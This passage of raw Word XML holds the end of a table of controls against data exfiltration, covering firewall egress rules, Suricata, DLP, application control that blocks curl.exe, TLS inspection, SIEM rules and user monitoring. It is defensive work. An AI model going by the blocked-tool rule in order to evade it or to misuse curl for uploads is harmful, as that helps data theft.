              <w:t>Prevent unknown outbound uploads</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2834" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="1E0EC8B7" w:rsidP="00000E6A" w:rsidRDefault="3CA4D6E1" w14:paraId="27A5AEB3" w14:textId="4E578509">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="32"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Configure firewall to allow outbound traffic to approved IPs and ports</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="1E0EC8B7" w:rsidP="00000E6A" w:rsidRDefault="6BBFDBE2" w14:paraId="63212538" w14:textId="30196849">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="32"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Blocking unknown destinations</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="1E0EC8B7" w:rsidP="00000E6A" w:rsidRDefault="6BBFDBE2" w14:paraId="0734417F" w14:textId="0BEC5A72">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="32"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Logging denied connections</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C64DB" w:rsidTr="6BBFDBE2" w14:paraId="33A8A18C" w14:textId="11730128">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1418" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="004C64DB" w:rsidP="65116661" w:rsidRDefault="004C64DB" w14:paraId="567C73EB" w14:textId="40DE06CD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Network IDS/IPS (Suricata)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2392" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="004C64DB" w:rsidP="006D13F1" w:rsidRDefault="006D13F1" w14:paraId="7F77D80F" w14:textId="19EC9E68">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Security system that monitors network traffic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2538" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="004C64DB" w:rsidP="004C64DB" w:rsidRDefault="004C64DB" w14:paraId="094D4AB5" w14:textId="7B48C4E0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Detect data exfiltration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2834" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="1E0EC8B7" w:rsidP="00000E6A" w:rsidRDefault="6BBFDBE2" w14:paraId="736F7661" w14:textId="39CA498C">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="31"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Deploy Suricata</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="1E0EC8B7" w:rsidP="00000E6A" w:rsidRDefault="6BBFDBE2" w14:paraId="04B61C27" w14:textId="7E61B2D6">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="31"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Add rules to detect exfiltration attempts</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="1E0EC8B7" w:rsidP="00000E6A" w:rsidRDefault="66C69A41" w14:paraId="6BBEC70C" w14:textId="37434AD1">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="31"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Send alerts to SIEM</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C64DB" w:rsidTr="6BBFDBE2" w14:paraId="3363C822" w14:textId="5D85DC94">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1418" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidRPr="00194137" w:rsidR="004C64DB" w:rsidP="65116661" w:rsidRDefault="004C64DB" w14:paraId="755E3A10" w14:textId="1EF91BE5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Data Loss Prevention (DLP)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2392" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="004C64DB" w:rsidP="006D13F1" w:rsidRDefault="006D13F1" w14:paraId="3AE662A9" w14:textId="6643A9E5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Software that monitors and control sensitive data</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2538" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="004C64DB" w:rsidP="004C64DB" w:rsidRDefault="004C64DB" w14:paraId="76EDF60F" w14:textId="68C407BE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Block sensitive data to be sent out</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2834" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="1E0EC8B7" w:rsidP="00000E6A" w:rsidRDefault="1655632F" w14:paraId="25973530" w14:textId="335C8A03">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="30"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Classify sensitive data</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="1E0EC8B7" w:rsidP="00000E6A" w:rsidRDefault="1655632F" w14:paraId="5F5DA59C" w14:textId="1D892D13">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="30"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Set DLP policies to block upload of sensitive data</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="1E0EC8B7" w:rsidP="00000E6A" w:rsidRDefault="1655632F" w14:paraId="71AB50FF" w14:textId="6E571B63">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="30"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Alert when data is uploaded</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C64DB" w:rsidTr="6BBFDBE2" w14:paraId="38AC02D1" w14:textId="3FDAADAB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1418" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidRPr="00194137" w:rsidR="004C64DB" w:rsidP="65116661" w:rsidRDefault="004C64DB" w14:paraId="19B4DA88" w14:textId="66D73A2B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Application Control (Windows Defender Application Control)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2392" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="004C64DB" w:rsidP="006D13F1" w:rsidRDefault="006D13F1" w14:paraId="4A3043F6" w14:textId="114A56DC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Security setting to restrict which program can run</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2538" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="004C64DB" w:rsidP="004C64DB" w:rsidRDefault="004B0E85" w14:paraId="48B24D20" w14:textId="471D33F5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Prevents execution of curl.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2834" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="1E0EC8B7" w:rsidP="00000E6A" w:rsidRDefault="7C7A6E0C" w14:paraId="64E4717B" w14:textId="044F913B">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="29"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Create rules to allow only approved applications</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="1E0EC8B7" w:rsidP="00000E6A" w:rsidRDefault="46E8AD3B" w14:paraId="6191821D" w14:textId="110BC447">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="29"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Block unauthorised programs like curl.exe</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="1E0EC8B7" w:rsidP="00000E6A" w:rsidRDefault="45620BAC" w14:paraId="44BA40F0" w14:textId="50A86804">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="29"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Log blocked executions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C64DB" w:rsidTr="6BBFDBE2" w14:paraId="164B6132" w14:textId="0636379E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1418" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidRPr="00194137" w:rsidR="004C64DB" w:rsidP="65116661" w:rsidRDefault="004C64DB" w14:paraId="2172D7D6" w14:textId="2EA64028">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">TLS inspection </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2392" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="004C64DB" w:rsidP="006D13F1" w:rsidRDefault="006D13F1" w14:paraId="4DCEEC48" w14:textId="4C7E802C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Technology to inspect encrypted traffic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2538" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="004C64DB" w:rsidP="004C64DB" w:rsidRDefault="004C64DB" w14:paraId="3B9D4D38" w14:textId="1CDF4937">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Detect encrypted exfiltration like encrypted file upload hidden in HTTPS traffic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2834" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="1E0EC8B7" w:rsidP="00000E6A" w:rsidRDefault="5CCBBFC3" w14:paraId="2635EE8C" w14:textId="339C16E8">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="28"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Configure secure web gateway</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="1E0EC8B7" w:rsidP="00000E6A" w:rsidRDefault="3749B39A" w14:paraId="612D5FD2" w14:textId="1F78D4C3">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="28"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Decrypt outbound TLS traffic</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="1E0EC8B7" w:rsidP="00000E6A" w:rsidRDefault="118892DA" w14:paraId="7DBE473E" w14:textId="322C31AF">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="28"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Inspect to look for suspicious uploads</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="1E0EC8B7" w:rsidP="00000E6A" w:rsidRDefault="71413687" w14:paraId="3AD7D11D" w14:textId="50008B20">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="28"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Encrypt traffic before forwarding</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C64DB" w:rsidTr="6BBFDBE2" w14:paraId="403053BD" w14:textId="0F6DDC0E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1418" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="004C64DB" w:rsidP="65116661" w:rsidRDefault="004C64DB" w14:paraId="423400CA" w14:textId="5DE15410">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>SIEM correlation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2392" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="004C64DB" w:rsidP="006D13F1" w:rsidRDefault="006D13F1" w14:paraId="600F25F7" w14:textId="64F983E1">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">Security tool that collects and analyses logs </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2538" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="004C64DB" w:rsidP="004C64DB" w:rsidRDefault="004C64DB" w14:paraId="7A76ED78" w14:textId="0C443BF9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Detect abnormal uploads</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2834" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="1E0EC8B7" w:rsidP="00000E6A" w:rsidRDefault="0ABF98DA" w14:paraId="1F249997" w14:textId="00AA7821">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="27"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Collect logs from endpoints</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="1E0EC8B7" w:rsidP="00000E6A" w:rsidRDefault="6D7FEF79" w14:paraId="08A070A8" w14:textId="4B69C3E1">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="27"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Create rules to detect and alert suspicious uploads</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="1E0EC8B7" w:rsidP="00000E6A" w:rsidRDefault="19EB223A" w14:paraId="113A3FD8" w14:textId="02553FDD">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="27"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">Map detections to MITRE ATT&amp;CK </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C64DB" w:rsidTr="6BBFDBE2" w14:paraId="7879BA7F" w14:textId="6284701A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1418" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidRPr="00194137" w:rsidR="004C64DB" w:rsidP="65116661" w:rsidRDefault="004C64DB" w14:paraId="08F0A648" w14:textId="74B40A7D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>User activity monitoring</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2392" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="004C64DB" w:rsidP="006D13F1" w:rsidRDefault="006D13F1" w14:paraId="1327C9E9" w14:textId="03C9D07B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>System that tracks user actions on devices</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2538" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="004C64DB" w:rsidP="004C64DB" w:rsidRDefault="004C64DB" w14:paraId="563B6587" w14:textId="6593952A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Identify unusual file access or activity which helps in identifying insider threats or compromised accounts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2834" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="1E0EC8B7" w:rsidP="00000E6A" w:rsidRDefault="4E22224B" w14:paraId="0F639780" w14:textId="7B126ED3">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="26"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Enable endpoint logging</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="1E0EC8B7" w:rsidP="00000E6A" w:rsidRDefault="540ECF98" w14:paraId="32505795" w14:textId="6FAD7F58">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="26"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Track file access to sensitive directories</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="1E0EC8B7" w:rsidP="00000E6A" w:rsidRDefault="131536F4" w14:paraId="4860A61F" w14:textId="64295849">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="26"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Alert on unusual access</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidRPr="00D01BC9" w:rsidR="00B8236E" w:rsidP="00B8236E" w:rsidRDefault="00B8236E" w14:paraId="06AB10F2" w14:textId="77777777">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="004D5913" w:rsidR="00B8236E" w:rsidP="00B8236E" w:rsidRDefault="00B8236E" w14:paraId="6BB5CE5B" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc220896711" w:id="66"/>
      <w:commentRangeStart w:id="67"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>References</w:t>
      </w:r>
      <w:bookmarkEnd w:id="66"/>
